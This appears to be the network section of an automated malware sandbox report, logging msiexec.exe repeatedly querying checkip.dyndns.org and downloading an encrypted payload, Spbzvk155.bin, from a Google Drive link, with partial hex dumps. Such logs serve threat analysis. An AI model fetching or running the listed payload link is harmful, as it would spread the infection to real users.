                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449750132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:04.502619982 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:37:05.811295986 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:05 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 6f51dd143e853764468bb37a60bfd389
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449757132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:07.663763046 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:37:09.062751055 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:08 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 57cf94e589bd6d0eab3d5bea5294b65d
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449769132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:10.915276051 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:37:12.284670115 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 9ba886fca6f0bc497a927c400376b95d
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.449776132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:14.123074055 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:37:15.518369913 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:15 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 18d7ed9bf28b8a56c07ee4dc2f9139ed
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.449788132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:17.689116001 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:37:19.085024118 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:18 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 1d11a0720f97d89485faf734cca4aaef
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.449795132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:20.928862095 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:37:22.279377937 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: be494e1f3ae4d4460df384e69af3ba83
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449736142.250.186.784438044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-21 09:36:46 UTC216OUTGET /uc?export=download&id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3 HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                      Host: drive.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-11-21 09:36:47 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Thu, 21 Nov 2024 09:36:47 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'nonce-YMh7iJEr3b5aJZUiOHcSxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449737172.217.16.1294438044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-21 09:36:48 UTC258OUTGET /download?id=1w8ji_XpKDCwq49908bdxucWWc7mZbjb3&export=download HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-11-21 09:36:51 UTC4915INHTTP/1.1 200 OK
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Security-Policy: sandbox
                                                                                                                                      Content-Security-Policy: default-src 'none'
                                                                                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                      X-Content-Security-Policy: sandbox
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                      Cross-Origin-Resource-Policy: same-site
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Disposition: attachment; filename="Spbzvk155.bin"
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 278080
                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 20:53:03 GMT
                                                                                                                                      X-GUploader-UploadID: AFiumC6n_TvM95NIA9pXozKBPiOkYWguIP-z3T-Ra_-42qpjxoaDplyeko9WxjWfsB-Et4phaqoRm2FraQ
                                                                                                                                      Date: Thu, 21 Nov 2024 09:36:51 GMT
                                                                                                                                      Expires: Thu, 21 Nov 2024 09:36:51 GMT
                                                                                                                                      Cache-Control: private, max-age=0
                                                                                                                                      X-Goog-Hash: crc32c=yMkrWA==
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-11-21 09:36:51 UTC4915INData Raw: 0e 65 04 d7 3c 71 e9 c1 3a f9 31 e8 9d d8 5f d6 d9 f1 6b 2d bf 82 6a cc 1f a8 2e 5e d3 0d 7a ce 18 60 bc f9 73 c7 1b 65 b1 83 8a 5e e8 b4 c9 1f 89 75 c7 dc 95 e2 de b7 07 8b a1 9b ea e2 b0 f7 a6 76 25 19 9c 27 86 24 df e9 0f 17 3e 8f 9e e9 cb d1 a0 61 64 95 dd 0e 88 fa 8d 68 88 3e f4 f7 33 32 fa 94 cb a1 fe b8 77 05 b7 8a 26 27 e3 ca 46 3a cc ab ad 69 34 41 7b e1 1a 02 50 38 b8 e9 ed 46 70 5f d7 6c c1 2f fe 3e a4 06 63 30 e5 b2 06 39 07 cd 0d 4e f6 72 9b 44 ac 9c 0d 70 92 b3 51 6e c8 5b fb 56 2f cf 16 ad e8 23 2f 87 00 af 58 2b 70 58 f2 17 79 e9 24 11 e6 ea c4 58 f4 39 09 ac ac 52 a4 62 5a b5 10 b1 65 5d a1 33 af 13 03 ca 47 53 30 33 66 65 21 c0 54 28 90 ba 40 5a 84 27 46 4c ff fd 11 23 b0 22 a9 c4 2f 66 b8 63 dc 0a 98 e3 f0 72 8a 60 cb 8b 65 0f 2d c3 d7
                                                                                                                                      Data Ascii: e<q:1_k-j.^z`se^uv%'$>adh>32w&'F:i4A{P8Fp_l/>c09NrDpQn[V/#/X+pXy$X9RbZe]3GS03fe!T(@Z'FL#"/fcr`e-
                                                                                                                                      2024-11-21 09:36:51 UTC4868INData Raw: f6 bb 9d ca 6b f0 0e b1 07 e7 20 b4 6b b4 0e e7 09 e5 59 55 f1 2d 06 10 3e 5e 1a f6 f6 b2 8a 5b 99 ed f7 73 5e c3 99 89 22 69 5b 40 36 86 c0 3e 63 06 32 89 35 75 2c 41 70 1b 02 b6 1a 4b 8a 60 56 12 bd 61 c2 cf ea 91 98 51 b2 15 ca d8 f2 50 c7 6b 3c 49 77 1f 56 0b 47 49 ff 23 bc 4a 35 64 d0 f5 99 8f a1 17 2e d1 57 c7 1f a8 68 d7 b4 82 7f ac 5d bb 05 81 10 e0 a4 f3 04 c0 20 bc 88 ee a6 98 da a3 c1 9a bc 1c 9f ef c3 4c d8 49 83 35 6b e8 ca b4 ad 73 dc b2 64 e5 e5 ee 4a 8b b6 49 ba 10 a4 f8 f6 d1 d4 e5 b3 84 1a c1 83 a9 2f 5c e7 33 ec 61 04 1f 38 d7 ee de a9 57 ce ed d6 2f 08 38 29 e1 94 c8 46 66 16 0d a3 33 de db 2b 3a 5b 6d 9d 2a de c8 88 6e a1 04 cd 4a 88 b0 a8 0b f1 7c 9a d8 59 1d 5b 21 7a 7b 1f a7 01 05 04 33 48 65 9f db ee c5 54 f7 4b ed 37 0f d2 c8 93
                                                                                                                                      Data Ascii: k kYU->^[s^"i[@6>c25u,ApK`VaQPk<IwVGI#J5d.Wh] LI5ksdJI/\3a8W/8)Ff3+:[m*nJ|Y[!z{3HeTK7
                                                                                                                                      2024-11-21 09:36:51 UTC1323INData Raw: 79 da 9f f9 34 72 da a4 d4 77 08 29 8d c9 d7 9a 2d 28 1d 13 ae 64 f4 b2 6b 21 bc e1 12 07 f5 68 f8 1b d7 22 80 68 78 87 3d 9d ee 82 0e 09 01 9e 91 2a 44 6c 0b 3a 47 c6 33 75 a0 26 4f ae d0 b5 e3 0c d8 a6 10 9f 12 69 d4 57 ce 3c 8b e8 f8 c6 56 54 d9 27 f6 a8 bb f9 9b 8a ea 96 ff 65 a6 dc 98 d0 da db c8 b2 ed f1 72 38 ab 37 cd a5 9b 71 2f f0 97 c7 28 31 65 db 2f a4 22 58 8e 7a f1 21 76 67 23 48 58 5a 57 b3 25 99 4c db d3 8b af ab 37 ce e7 f1 ed 9b f7 0b 9a 68 54 29 88 ac f4 8e 23 72 23 cf 1d 75 84 68 30 78 e7 90 7d 73 83 38 eb 54 fd 38 ad 2b 80 c0 d3 81 f1 83 f9 b5 35 cc ab b3 4f 68 e8 54 5f 7e 18 0c b9 9f b4 22 51 a4 3d d5 71 4d 3a 82 42 30 ac 77 a9 c1 f7 22 8e 12 74 14 ee 3d 21 74 25 27 b1 b9 b2 4a 4d 46 da 90 53 e7 db e3 bf 0f 4c 19 c9 f8 ad 1c 89 84 df
                                                                                                                                      Data Ascii: y4rw)-(dk!h"hx=*Dl:G3u&OiW<VT'er87q/(1e/"Xz!vg#HXZW%L7hT)#r#uh0x}s8T8+5OhT_~"Q=qM:B0w"t=!t%'JMFSL
                                                                                                                                      2024-11-21 09:36:51 UTC1390INData Raw: 13 d3 ae b7 6b c8 59 2d 10 5c 66 68 d3 1a 04 41 25 08 98 d2 c4 58 f0 9b 7c f3 de 2b e7 63 29 17 ec 2f 8b 11 a1 33 ab b1 26 d6 35 d4 df 33 14 c6 02 b4 04 28 9a fd 18 5a 84 39 55 6d e4 70 51 23 ee 65 88 d2 5d a7 aa 63 ac c8 b9 f4 d8 c6 ca 60 c1 09 40 17 5f 94 d8 9c 8f 7c 3c 4f f5 c8 ad 8b 62 7d d8 da af 19 04 a6 8b 56 dd 69 96 09 78 78 4b 1b 0a 25 c7 6a a9 64 45 a2 65 3d 63 98 fa ad cc 9c 9a 16 59 22 ea 24 1a c8 41 bf e3 56 36 f7 21 86 e0 77 af 18 9a df cc 7c ad bc 82 be bd 21 30 1b 76 84 aa 8f e7 3d 47 57 ab d8 77 8b a2 c3 13 28 e7 84 00 34 8f c2 2b 57 2f 7c c4 98 3e b3 a9 cd 32 e6 ad 84 43 63 30 38 79 0e ec e0 60 c4 9b 5c d1 8d a0 85 ad 64 f8 38 ae 21 61 e4 e5 1b d8 d3 13 a8 ef e4 cb 1b cc 1c c1 9b 3d d7 88 2d 32 e6 89 b2 43 7e a8 98 53 38 c6 f2 51 cf ff
                                                                                                                                      Data Ascii: kY-\fhA%X|+c)/3&53(Z9UmpQ#e]c`@_|<Ob}VixxK%jdEe=cY"$AV6!w|!0v=GWw(4+W/|>2Cc08y`\d8!a=-2C~S8Q
                                                                                                                                      2024-11-21 09:36:51 UTC1390INData Raw: dc 83 74 38 7d 4e 02 12 70 b7 51 e6 77 69 9a 2e 39 72 60 a4 aa 51 02 f9 35 5d f7 81 68 24 c6 49 c5 4f 5e 44 e0 ba 5f 17 6e ff 21 b5 53 15 8e c7 7b d0 13 15 57 36 7f 9f 42 5c 0f 69 67 67 25 72 f6 70 5c e7 04 af 44 72 93 93 98 c8 34 e1 ab c9 40 64 0e 38 5f de 30 2b 33 56 97 1e ad b3 81 91 16 b4 db f6 76 71 19 9c 49 50 f5 20 a3 5f 9e 13 77 65 62 7b 3c ae 0e da a0 fb d6 5c 90 82 dc ee 91 6c 2c d7 4e a3 84 7d 84 8d 34 47 cf 49 b5 e5 da ca 88 2a 90 1a 1a 30 09 94 67 9c 3f 75 a8 b1 f9 99 f5 4c 7f 18 a7 6e c3 a5 4f 64 b6 43 0a c1 26 a1 dc 26 21 af 4f cc 61 96 05 24 75 70 62 0c 53 84 25 64 d5 a2 de af cd 79 b3 e1 ad 70 fd b6 21 9f 07 68 29 43 b9 8b 6e 82 ab 71 23 01 34 61 be ec 97 39 29 8d 29 2f 43 d4 cb 3b 75 6d 57 b5 84 84 61 0e c0 8a b2 59 4d e9 49 4b 66 59 49
                                                                                                                                      Data Ascii: t8}NpQwi.9r`Q5]h$IO^D_n!S{W6B\igg%rp\Dr4@d8_0+3VvqIP _web{<\l,N}4GI*0g?uLnOdC&&!Oa$upbS%dyp!h)Cnq#4a9))/C;umWaYMIKfYI
                                                                                                                                      2024-11-21 09:36:51 UTC1390INData Raw: b1 1f c2 2e 31 d5 4f 59 24 c6 23 bc 86 32 cb b5 1b b1 88 0a 6b 15 aa 03 2d 58 2b 78 29 7a e8 ae 50 7a d2 f2 33 58 c9 df d0 20 98 33 40 c9 1c 6a 0c 72 93 47 2d bd 64 d7 6f b8 de 06 0c 90 7f 0f 65 8a 53 41 04 b8 06 4b 32 bf dc 0e ab 46 19 4d da 1f 4b de 02 4a 30 d5 1d 0e 8d 6d 5f a5 cb 34 28 17 59 30 cc 01 50 d7 1f d4 64 28 aa a3 7e 3d 79 c6 31 32 df 66 30 2a 84 b7 fa ff 25 7f a0 47 f0 2c ca 03 39 be b6 eb cd 33 26 25 24 22 01 e3 99 ba 99 b4 22 f0 d2 6b 64 7e 08 80 61 db b9 f4 06 ef 71 1f ab 2d 0c c4 23 d3 70 f6 f6 f2 e3 4d eb e6 e2 73 2e 3b bc 9e 0a ea 5a 40 3c b5 e4 26 11 5d 3d 89 45 d7 09 58 0e 21 02 b6 1e 44 ae 7a 24 70 b2 61 b2 a5 ce 8a e6 43 b2 15 ce b7 1c 50 c7 61 9e 6c 6b 6c 63 1f 47 ee 5c 0b c9 92 34 6e bf b9 99 8f ab 5f 26 d8 d8 b5 45 c4 d6 66 b4
                                                                                                                                      Data Ascii: .1OY$#2k-X+x)zPz3X 3@jrG-doeSAK2FMKJ0m_4(Y0Pd(~=y12f0*%G,93&%$""kd~aq-#pMs.;Z@<&]=EX!Dz$paCPalklcG\4n_&Ef
                                                                                                                                      2024-11-21 09:36:51 UTC1390INData Raw: 77 5f 10 d8 d1 0f f5 79 9d 5b 0c 22 84 10 19 97 05 2e f8 aa 8f 09 01 82 af a2 45 7f 06 2b 60 ff 0f 74 a0 0e 38 ba 2e b9 de 10 55 e0 63 5f 13 4c c8 0d 9b 37 8b 92 d0 f4 94 54 df 8f c0 b7 d4 b4 e5 b0 ee 34 de 0e 17 05 89 da c5 37 88 b2 e7 f7 c1 15 dd 8c 8b a5 91 0b b0 d5 8d b1 42 e5 65 ab 87 81 28 4b 71 bd e1 21 07 6a 81 3a df 40 25 5e 97 bc 2b db 3c 8b af ab fa 2c ff 83 98 8e e6 73 25 c0 0d 01 3c ad d1 92 f3 6c 36 bd 0c c5 a1 0f ba e4 92 90 77 db 04 08 ec 01 f2 32 ce 97 d7 1e b8 b9 81 fd e2 17 10 d2 f1 83 40 68 92 84 cf 77 66 56 91 dd b0 80 72 a9 51 43 6a 65 0e 20 6a 43 ac aa 22 af 3f 22 ab 30 40 6a d2 37 32 6f 56 c6 d3 b9 b8 53 9a 38 eb 90 53 e3 d7 42 bd 0f 38 7d 74 7b ad 6c 95 ba a0 78 a2 71 d8 d0 93 07 d8 f6 f0 3a b8 62 3d cb 25 49 5c 6e fa e6 bf 5a f4
                                                                                                                                      Data Ascii: w_y[".E+`t8.Uc_L7T47Be(Kq!j:@%^+<,s%<l6w2@hwfVrQCje jC"?"0@j72oVS8SB8}t{lxq:b=%I\nZ
                                                                                                                                      2024-11-21 09:36:51 UTC1390INData Raw: 56 57 2e be ae 4e eb fd c0 d7 3b 03 a6 d3 96 f5 1c 9c d4 11 6d 69 0d 22 53 c7 14 91 64 65 a6 1b a8 61 b0 fd bb e4 17 9a 16 2d 0b 14 25 0d dc 71 c8 d5 8f 34 87 5f e7 cf 77 ab 34 a1 be dc 76 cc 88 d4 7f bd 21 3e 25 b6 85 b9 8f f6 e5 6e 42 82 ec 77 8b bc 2e 36 15 cf e6 06 47 45 1c 2b 5d 07 bd ba af 34 b3 de 7d a7 e4 a7 e7 52 5a b6 46 43 04 fa 1a 12 14 bf 4d ff ce 38 98 20 2e f8 29 a8 6b b2 96 de 1e a6 9e b1 8d fc a3 b9 1b cc 1c 63 af 22 d7 5a 32 32 e6 03 23 5a 00 9a ea ce 2c 64 a7 63 e6 86 28 dd 96 c5 c2 aa 67 c9 9f e1 27 75 0d 87 e6 ab 8a dd c0 81 42 df ab 26 e8 a9 3a 34 37 28 72 7f 1e dc 64 5e 0c 1a 2a ea 55 b5 3b a1 7e 27 74 2a c2 38 d1 2e 3a de d6 4d 26 11 af fb b0 64 dc 83 b2 8a 60 95 c4 fd f1 15 ef cc 23 97 44 5e 2b af e5 b6 06 2d ee 6e 6c bb 0d 1b 91
                                                                                                                                      Data Ascii: VW.N;mi"Sdea-%q4_w4v!>%nBw.6GE+]4}RZFCM8 .)kc"Z22#Z,dc(g'uB&:47(rd^*U;~'t*8.:M&d`#D^+-nl
